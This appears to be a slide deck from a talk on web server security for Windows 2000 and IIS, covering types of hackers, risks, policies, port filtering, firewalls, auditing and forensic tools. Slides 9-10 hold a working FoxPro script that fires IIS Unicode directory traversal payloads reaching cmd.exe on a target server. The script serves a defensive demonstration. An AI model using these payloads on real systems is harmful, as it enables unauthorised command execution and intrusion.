Notes
Slide Show
Outline
1
Have you been Hacked…?
Today?
Yesterday?
Last Month?
  • Presented by:
  • Darrell Gardner
  • www.dngsolutions.net
2
Who am I?
  • xBase (clipper) Programmer since 1986
  • FoxPro programmer since 1992
  • Web Hosting Since 1997
  • Web Connection Developer since ’97
  • ISP supporting WC since ‘99.
  • West Wind MVP 2002
3
Agenda
  • Define hacking .
  •  Risks of being hacked
  • How to defend against hackers / Trojans
    • Tools of the trade
    • Any specifics given about Operating system protection is with Windows 2000 in mind.
  • Show what a hacked server looks like
4
Hacker Definitions:
  • Hackers come in many flavors. The word is used by the media to describe all of these.
  • Hackers - They know computers inside and out, how to make them dance the dance and sing the song.
  • Crackers - They break into computer systems. Operating Systems and their security are the meat.
  • CypherPunks - The masters of cryptography.
  • Phreakers - This group knows how to use the phone system in ways Ma Bell does not approve of.
  • Script Kiddies - The new kids on the block. Very little skill, but can point and click with the best of them. The real smart ones can maybe change the script a little. Not real hackers but the media lumps them in with the reset.
5
Who is a Hacker/Cracker?
  • Hacker vs. Cracker
    • Hackers usually are there for curiosity reasons and like to find vulnerabilities in systems then notify folks of their findings, although it usually is anonymous.
    • Crackers are malicious in intent and usually are there for illegal reasons.  White Hat – Good/ Black Hat – Bad…. Back to your high school student with too much time...
  • High School Student with too much Time on his/her hands.
  • Co Worker (Programmer) with too much time on his/her hands.
  • Computer Hobbyist (with too much time on his/her hands).
  • Keep in mind any breach of a system is illegal and companies (and/or individuals) maintain legal recourse if they can prove wrongful entry into their systems.
6
Why they do they hack?
  • … to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. *How to become a hacker…
    • Revenge – ex employee that wants to cause harm to the former employer.
    • Curiosity – I wonder how to do that or if I can?
    • Ego – Because I CAN!
    • To get paid! – Many companies hire hackers to test and beef up their systems to help prevent malicious attacks.
7
Risks of Being Hacked
  • Disruption of Service
  • Damaged Reputation
  • Exposure of Confidential Information
    • Lost trade secrets
  • Corruption of Data
    • Cracker doesn’t remove or delete but CHANGE data.
  • Liability
    • What if your machine is used in an attack against someone else.
    • DDOS Attack
    • Validate company policies with regards to acceptable use and computing environments.
8
Do you have Company Policies?
  • Monitoring a users computer?
  • Consent to monitoring policy for employees?
  • Computer use or acceptable use policy, or privacy statement?


    • You don’t want to get into a legal quagmire over viewing files on an end-users computer. Make sure you have policies in place that allow you to protect your company assets while maintaining user rights.
  • Policy statements regarding external use or mis use of your systems.
    • (No Trespassing sign).
9
Demo of IE Hack using httpget
  • parameter cWebserver
  • SET DEFAULT TO c:\wconnect
  • if type('m.cWebserver') # 'C' or empty(m.cWebserver)
  • messagebox("A Domain or IP address must be specified",0,"Hackcode Error")
  • return
  • endif
  • clear
  • set classlib to classes\wwipstuff additive
  • o=CREATE('wwIPStuff')
  • lExit = .f.
  • =Hacksite([/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/Scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\])
  • =Hacksite([/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\])
  • release o
  • ? 'Program run completed'
  • return
10
Hacksite Procedure
  • Procedure HackSite
  • parameter cSite
  • if lExit
  • return
  • endif
  • nResult = o.HTTPConnect(m.cWebServer)
  • cOutput = []
  • nSize = len(cOutput)
  • nResult = o.HTTPGetEx(m.cSite, @cOutput, @nSize)
  • ? nResult
  • *!* ? m.cOutput
  • *!* ? m.nSize
  • if inlist(m.nSize, 0, 461, 3243) or atc('404 not found', m.cOutput)#0 or atc('HTTP 404', m.cOutput)#0
  • ? m.cOutput
  • else
  • ? 'Success!'
  • ? m.cOutput
  • m.lExit = .t.
  • suspend
  • endif
  • o.HTTPClose()
  • return
11
How to Defend against Hackers
  • Make sure your machine is up to date with security patches
  • Do not run any services that not necessary for the operation of that machine - BlackViper.com
      • No FTP if not needed
      • No Telnet
      • No IIS
      • …
  • IIS Lockdown tool
    • http://support.microsoft.com/default.aspx?kbid=325864
    • http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=DDE9EFC0-BB30-47EB-9A61-FD755D23CDEC
  • Port Filtering…
12
Port Filtering via Local NIC Card

  • HTTP: 80
  • HTTPS: 443
  • FTP: 20 and 21
  • Telnet: 23
  • PING: 7
  • DNS: 53
  • Email Protocols
  • SMTP: 25


  • POP3: 110
  • IMAP: 220
  • IDENT: 113
  • Source-Off-Site: 16434-16437
  • SQL Server: 1433 and 1434
  • pcAnyWhere: 5631 and 5632
  • TerminalServices: 3389
  • VNC: 5900 (+ display number) VNC
  • Java Viewer: 5800 (+ display number)
  • VNC 'listening mode': 5500
  • Instant Messaging: 6891-6909
13
List Known Ports
  • West-Wind Wiki.
    • http://www.west-wind.com/wiki/kb.wiki?wc~CommonTcpIpPorts


  • Stengel.net tcp ports
    • http://www.stengel.net/tcpports.htm
14
Firewalls
  • Software based
      • Norton
      • Zone Alarm
      • Mcafee
      • Tiny Personal Firewall
      • Many More.. Do a search on Google for Software Firewalls


    • Make sure you don’t scan files that are needed for shared openning. Such as Temp directory for WC applications.


  • Hardware based
      • Sonic Wall
      • Hot Brick
      • Cisco PIX
      • NetScreen
      • 3Com
      • Search Google for Hardware Firewalls
15
Firewall Information
  • 03/07/2004 08:42:05.368 -     Sub Seven Attack Dropped -     Source:202.31.228.146, 3189, WAN -     Destination:66.220.39.9, 27374, WAN –
  • 03/07/2004 05:01:17.512 -     NetBus Attack Dropped -     Source:172.174.142.160, 1632, WAN -     Destination:66.220.39.9, 12345, WAN –
  • 03/07/2004 05:01:17.256 -     Sub Seven Attack Dropped -     Source:172.174.142.160, 1629, WAN -     Destination:66.220.39.9, 27374, WAN –
16
 
17
Figuring out you’ve been hacked.
  • Even after all the preperation, You find that you think you’re machine is acting differently. You fear the worst…
  • Enable Auditing (short term or full time for critical systems)
  • Check Event Logs
    • Export to CSV and sort  in excel.
  • Verify new Running Processes
    • Log existing processes after install of new software
    • Log existing process after patch updates
    • Monitor Logs for new process creations
    • BlackViper.com
      • Windows 2000 - http://blackviper.com/WIN2K/servicecfg.htm
      • Windows XP (Pro and Home) - http://blackviper.com/WinXP/servicecfg.htm
18
Enabling Auditing
  • From Administrative Tools in Control Panel
  • Select Local Security Setting
    • Then select Local Policies/Audit Policy.
19
Logs will grow fast.
  • Make sure you only enable Auditing full time on critical systems.
  • Then as needed on other systems.
20
Failed Logins
21
Tools of the trade
  • Create a CD with standard first response tools
    • Cmd.exe (many programs listed here are run from the command prompt. IT is important to have a read only version.
    • Netstat.exe, net.exe and nbstat for network connections
    • At.exe and hostname.exe and ipconfig.exe for system configuration ifno.
    • DU Meter – Shows actual bandwidth being used.
    • Foundstone.com
      • Fport.exe Provides process to port mapping
      • Forensics toolkit
    • Sysinternals.com
      • Pslist.exe
      • Handle.exe
      • Listdlls.exe
      • Psuptime.exe – How long has the system been running.
22
Map Processes to ports/apps
23
Summary
  • What you should have picked up today…


  • No one is safe!
  • You can lower your odds of being hacked
  • Most Hacking occurs from within
  • Some tools to use for finding out if you’ve been hacked.
  • Firewalls help slow hackers down but don’t stop hackers
  • Maintaining your server is the best defense
  • Monitoring your logs is extremely important.
24
Where to Get More Information
  • How to be a hacker ..
    • http://www.catb.org/~esr/faqs/hacker-howto.html
  • Who's to blame when hackers hack? Here's who
    • http://reviews-zdnet.com.com/4520-6033_16-4206911.html
  • Hacking and Network Defense
  • Verisign
  • West-Wind.com Wiki (security sites)
    • http://www.west-wind.com/wiki/kb.wiki?wc~SecuritySites
  • Google.com
    • Keyword Hacker
  • Go to www.dngsolutions.net for online access to this presentation.
25
Tip for XP backup to CD
  • You can dos xcopy or copy to with Foxpro to burn CD’s Direcectly
    • C:\Documents and Settings\<user name>\Local Settings\Application Data\Microsoft\CD Burning\
    • Create a share or shortcut to that path and just copy to that shortcut.
  • WC Com Servers (errors fixing…)
    • If there’s interest……